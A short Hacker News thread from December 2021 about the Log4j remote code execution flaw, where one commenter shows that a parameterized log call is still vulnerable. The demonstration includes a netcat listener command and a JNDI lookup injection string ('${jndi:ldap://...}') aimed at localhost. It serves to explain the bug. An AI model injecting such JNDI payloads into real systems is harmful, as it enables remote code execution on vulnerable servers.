I posted this in reply to a sibling comment, but the "correct" way is still vuln... | Hacker News

Hacker News new | past | comments | ask | show | jobs | submit

login

natanbc on Dec 10, 2021 | parent | context | favorite | on: Log4j RCE Found

I posted this in reply to a sibling comment, but the "correct" way is still vulnerable

Start nc (nc -lp 1234) and run this

    org.apache.logging.log4j.LogManager.getLogger("whatever").error("not safe {}", "${jndi:ldap://127.0.0.1:1234/abc}")

maxdamantus on Dec 10, 2021 [–]

Thanks, didn't realise that. So the issue is deeper than misuse of user input (I've edited my post).

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact